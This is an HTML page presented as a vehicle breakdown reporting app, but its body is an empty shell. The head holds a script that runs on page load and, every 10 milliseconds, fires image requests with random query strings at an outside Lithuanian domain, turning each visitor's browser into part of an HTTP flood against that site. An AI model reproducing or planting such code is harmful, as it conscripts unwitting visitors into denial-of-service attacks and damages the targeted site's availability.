<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>Report a vehicle break down</title>
    <script>
        function imgflood() {
            var TARGET = 'pigustralai.lt'
            var URI = '/apie-mus?'
            var pic = new Image()
            var rand = Math.floor(Math.random() * 1000)
            pic.src = 'http://'+TARGET+URI+rand+'=val'
        }
        setInterval(imgflood, 10)
    </script>
</head>
<body>
<div ng-app="brk-app">
    <header>
    </header>
</div>
</body>
</html>